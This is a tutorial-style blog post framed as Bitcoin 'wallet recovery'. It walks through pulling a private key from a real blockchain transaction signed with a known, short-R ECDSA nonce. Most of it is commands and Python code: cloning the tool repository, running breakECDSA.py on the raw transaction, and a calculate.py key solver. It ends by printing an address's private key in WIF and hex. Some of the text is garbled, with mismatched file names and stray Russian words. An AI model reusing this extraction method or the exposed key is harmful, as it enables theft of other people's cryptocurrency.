Bitcoin Wallet Recovery via ECDSA Short Signatures



We all know that the disclosure of the secret key in the ECDSA signature can lead to the complete recovery of the Bitcoin Wallet. In our earlier articles, we looked at weaknesses and vulnerabilities in blockchain transactions, but there are also ECDSA short signatures that also lead to the full recovery of a Bitcoin Wallet.

Why are these ECDSA signatures called short?

You can get the answer to this question from the topic under discussion: «The shortest ECDSA signature» [The shortest ECDSA signature]

In our last article: «Reducing the private key through scalar multiplication using the ECPy + Google Colab library» we created a Python script: maxwell.py which generated a rather interesting public key for us


(0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63 , 0xc0c686408d517dfd67c2367651380d00d126e4229631fd03f8ff35eef1a61e3c)

As we know the value of the signature, "R"this is the public key from the private key(Nonce)

Take a look at Blockchain transaction: 11e6b169701a9047f3ddbb9bc4d4ab1a148c430ba4a5929764e97e76031f4ee3



The size of this transaction is only:156 байт

How can I restore a Bitcoin Wallet through ECDSA short signatures?

In the cryptanalysis of the Bitcoin blockchain, we use our own Bas h script:btcrecover.sh

bitcoin wallet recovery process
Bash script: btcrecover.sh

pip2 install -r requirements.txt
chmod +x btcrecover.sh

./btcrecover.sh 12yysAMhagEm67QCX85p3WQnTUrqcvYVuk

./btcrecover.sh 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT


| privkey : addr |

Let’s open bitaddress and   check:


Let’s move on to the experimental part and analyze in more detail all the scripts for restoring a Bitcoin Wallet

Open  [TerminalGoogleColab] .

Let’s use the «09BitcoinWalletRecovery» repository .

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/09BitcoinWalletRecovery/



Install all the necessary modules:


pip2 install -r requirements.txt

Using the breakECDSA.py script, we get from the RawTXsignature [R, S, Z]

python2 breakECDSA.py 0100000001afddd5c9f05bd937b24a761606581c0cddd6696e05a25871279f75b7f6cf891f250000005f3c303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c6302200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8012103151033d660dc0ef657f379065cab49932ce4fb626d92e50d4194e026328af853ffffffff010000000000000000016a00000000 > signatures.txt

The result will be saved to a file: signatures.txt

Let’s open the file:PublicKeys.txt

cat signatures.txt


R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

As we know from our last article , we know the secret key to generating the signature R

In our case, the secret key (Nonce) is:

0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0 --> 0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63, 0x3f3979bf72ae8202983dc989aec7f2ff2ed91bdd69ce02fc0700ca100e59ddf3


K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

Now that we know the value of [K, R, S, Z] we can get the private key using the formula and restore the Bitcoin Wallet.

To get the private key, let’s use the Python script: calculate.py

def h(n):
return hex(n).replace("0x","")

def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

print (h((((S * K) - Z) * modinv(R,N)) % N))

Let’s run the Python script: calculate.py

python3 calculate.py


Let’s open bitaddress and   check:

ADDR: 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT
WIF: L3LxjEnwKQMFYNYmCGzM1TqnwxRDi8UyRzQpVfmDvk96fYN44oFG
HEX: b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f


Private key found!

Bitcoin wallet restored!

Короткие подписи ECDSAis a potential threat of losing coins BTC , so we strongly recommend everyone to always update the software and use only verified devices.

This video was created for the  CRYPTO DEEP TECH portal  to ensure the financial security of data and cryptography on elliptic curves  secp256k1 against weak signatures  ECDSA in cryptocurrency BITCOIN


